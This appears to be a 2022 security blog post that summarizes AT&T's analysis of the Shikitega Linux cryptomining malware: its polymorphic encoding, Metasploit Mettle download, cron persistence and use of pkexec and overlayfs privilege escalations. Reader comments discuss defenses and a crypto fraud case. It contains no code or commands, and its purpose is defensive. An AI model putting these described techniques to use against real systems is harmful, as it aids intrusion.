New Linux Cryptomining Malware

The malware was dubbed “Shikitega” for its extensive use of the popular Shikata Ga Nai polymorphic encoder, which allows the malware to “mutate” its code to avoid detection. Shikitega alters its code each time it runs through one of several decoding loops that AT&T said each deliver multiple attacks, beginning with an ELF file that’s just 370 bytes.

Shikitega also downloads Mettle, a Metasploit interpreter that gives the attacker the ability to control attached webcams and includes a sniffer, multiple reverse shells, process control, shell command execution and additional abilities to control the affected system.

[…]

The final stage also establishes persistence, which Shikitega does by downloading and executing five shell scripts that configure a pair of cron jobs for the current user and a pair for the root user using crontab, which it can also install if not available.

Shikitega also uses cloud hosting solutions to store parts of its payload, which it further uses to obfuscate itself by contacting via IP address instead of domain name. “Without [a] domain name, it’s difficult to provide a complete list of indicators for detections since they are volatile and they will be used for legitimate purposes in a short period of time,” AT&T said.

Bottom line: Shikitega is a nasty piece of code. AT&T recommends Linux endpoint and IoT device managers keep security patches installed, keep EDR software up to date and make regular backups of essential systems.

Another article.

Slashdot thread.

Tags: cryptocurrency, Linux, malware

Posted on September 12, 2022 at 9:41 AM • 6 Comments

Comments

Clive Robinson • September 12, 2022 11:24 AM

@ ALL,

As I’ve said before, the first question to be asked is,

“What is the business case for this computer to be connected to publicaly accessible communications?”

Usually there is no business case other than,

“It seemed like a common thing to do at the time.”

Whilst no commodity OS can be made secure, just as little or no commodity level hardware can be made secure, the *nixes used to be fairly easy to,

1, Mininise
2, Run from ROM.

Sadly those two ways of making your computer way less of a piece of hanging fruit are nolonger what they were with many *nix’s these days.

Plus the desire by managment and marketing to do “the dumbest of things” appears to be getting way worse.

The two exploits the malware alledgedly uses “pkexec(1)”[1] and “overlayfs”[2] are niceties, not essentials on a Linux “server” or “appliance” box.

Unfortunately for “embedded systems” such as appliances and IoT boxes they “come recommended” for various reasons. The oft used argument for “overlayfs” is it makes using what is a ROM image work in RAM with minimal changes…

So you can guess what is being hit and why they’ve not been patched in a year.

@ Bruce,

Maybe you should provide a link to your previous essays on why IoT and similar not being updated or patched is such a bad idea…

[1] CVE-2021-4034 : A local privilege escalation vulnerability was found on polkit’s “pkexec(1)” utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn’t handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it’ll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.

https://linux.die.net/man/1/pkexec

[2] CVE-2021-3493 : The “overlayfs” implementation in the linux kernel did not properly validate with respect to user namespaces the setting of file capabilities on files in an underlying file system. Due to the combination of unprivileged user namespaces along with a patch carried in the Ubuntu kernel to allow unprivileged overlay mounts, an attacker could use this to gain elevated privileges.

https://wiki.archlinux.org/title/Overlay_filesystem

Clive Robinson • September 12, 2022 12:22 PM

@ ALL,

As somebody is likely to pass comment such as “it’s easy to say what’s wrong, but that’s not helpfull…”, I guess I’d better forestall it.

Malware is getting stealthier and stealthier “on the wire” the simplest way to stop it is via the age old high security “Seperation” and “segregation” that is if there is no pressing business case to connect systems, why make future trouble for yourself by doing so?

Common sense right?

So investigate seperation by not having “electronic communications” paths to the outside of the organisation. Back last century this was standard practice in regulated industries including Utilities and Finance. Smart Devive and BYOD has made this difficult but at the end of the day “they are employees”.

Seperation in some cases may not be enough, especially for some –but not all– insider threats. Thus the next level up is “segregation” by “air gap” and at higher levels “energy gap”. Whilst working in a cage with your work going through “Hardware Security Modules”(HSM) to protect encryption and keys from leakage is not fun, it may be justified for some employees to carry out some parts of their jobs.

But sometimes systems have to be connected to the various forms of communications paths which side and covert channels can use.

Here you have to accept the fact that your systems will be successfully attacked and you can not stop it happening. But that does not mean that you can not do anything about it. There are various reasons why systems get attacked and identifying these and minimising them makes,

1, Your systems less likely to be attacked.
2, Have much less of a critical impact if they are attacked.
3, Easier to detect when they have been attacked.

It’s suggested that this malware is primarily after “CPU Resources” for crypto-coin mining. Whilst this may be true the inclusion of other code suggests that it is not the sole reason.

It’s noted that the code is not installed in one hit, but instilled over many small hits to minimise visable signitures in traffic patterns and the like.

Well if it is for crypto-coin mining, it needs to do “work” and quite a lot of it. This means that energy consumption must rise and there will be other easy to spot signitures,

1, Peak Power consumption.
2, Waste energy dissipation.

If you are aware of this it’s fairly easy to “instrument” for in ways that an external attacker can not detect or counter measure.

Quite a lot of modern aplliance and IoT boxes are switching to USB-C power supplies. You can buy very cheaply “power monitors” to put in line that show the power being consumed to better than one part in a thousand. Some even can be connectd up to a computer so the power signiture can be closely watched. Likewise you can get “clamp on” multimeters and oscilloscopes for very small amounts of money that are specifically designed to be connected to a stand alone computer for “data logging” and testing. I’ve quite a few just floating around in my engineering lab.

If you realy want to go to town the price of “Vector Network Analysers”(VNAs) and “Spectrum Analysers”(SAs) that connect to computers are now less than $100. Both can give you a very good level of “signal detection”.

I’ve discussed “signal detection” on this blog oh about a decade ago when outlining part of “Castles -v- Prisons” or as @Wael used to prefer “C-v-P” or just “CvP”. It was for a number of reasons “an idea ahead of it’s time” but parts of it appear to have “now come of age”. As I suspect the rest of it to do within half a decade at most.

Clive Robinson • September 12, 2022 12:57 PM

@ ALL,

We’ve discussed this problem before on this blog,

Have a look at,

https://www.schneier.com/blog/archives/2015/03/bios_hacking.html/#comment-243953

Where @Wael outlines what you should be considering in your battle plans.

The page is the one where our host @Bruce makes his “First IC, then to PhD, then hacker” comment.

It’s worth reading, the first half of the comments or so will show you that what in 2015 was happening to Commodity PC Motherboards back then now with a little more effort happens to embedded and IoT boxes…

tim • September 12, 2022 2:37 PM

Malware is getting stealthier and stealthier “on the wire” the simplest way to stop it is via the age old high security “Seperation” and “segregation” that is if there is no pressing business case to connect systems, why make future trouble for yourself by doing so?

Because its hard and expensive. Personally I’m in year 2 in a 3 year project to lock egress down. This eats up a lot of engineering time. Most company leaders would push back on the benefits of dedicated that much time (fortunately ours don’t but we are the exception)

You can buy very cheaply “power monitors” to put in line that show the power being consumed to better than one part in a thousand.

In the building I’m sitting in there has got to be a hundred network connected sensors that do something (and I’m not including the vending machine’s with cellular connections). From hvac monitors to the elevators. How do you remotely expect an organization to manage “power monitors” for all those systems?

The simple answer is device isolation and egress filtering. But even if you don’t have that in place “crypto” miners are noisy as hell traffic wise. You’ll see the logs of systems and network devices in its path light up like a Christmas tree.

Ted • September 12, 2022 5:09 PM

A Bleeping Computer article pointed out that using a legitimate cloud hosting service could increase the risk of being tracked down by law enforcement.

I was hoping for a little bit of info on the actors, regions, or devices associated with the Shikitega campaign. Interesting that the report came from AT&T Cybersecurity.

I was just reading an SEC complaint against a Bitcoin mining company.

MCC’s investor marketing materials touted its 45,198 active machines that mined Bitcoin.

Well it turns out the company didn’t mine anything. They just figured out how to keep investor money. However, if more and more crypto companies do have to register, I wonder if more info will be required about mining setups.

Clive Robinson • September 13, 2022 2:16 AM

@ Ted, ALL,

Re : SEC and the Crypto-fibber.

“Well it turns out the company didn’t mine anything. They just figured out how to keep investor money.”

Would you call that Fraud?

I would, perhaps claiming it was a ponzie scheme needs just a tads more evidence, but certainly it looks like a con.

“However, if more and more crypto companies do have to register, I wonder if more info will be required about mining setups.”

It’s an interesting point…

It’s not illegal to print securities such as bonds or even money that is just “printing” and is actually done by many printers who have the necessary skills and tools (my father used to be the chief accountant for one some half century or so ago).

It’s the act of “passing them off” as what they are not that is the crime (along with all the following crimes down the money trail). Then there is all the fun conspiracy stuff, after all the receptionist who answers the phone is technically complicit as would be all the other employees, but are they in the know to be part of a conspiracy?

As we will probably find with Twitter, it is possible to be on the organisational governing board and not be aware of what other board members are upto…

Similar applies to stock holders.

It has been claimed that is why the SEC goes after fines not convictions… My view is somewhat different due to the likes of changes in society governance to “rent seeking” behaviours, and further the likes of “Revolving door employment” and similar creating almost a conspiracy of it’s own…

New Linux Cryptomining Malware

Comments

Leave a comment Cancel reply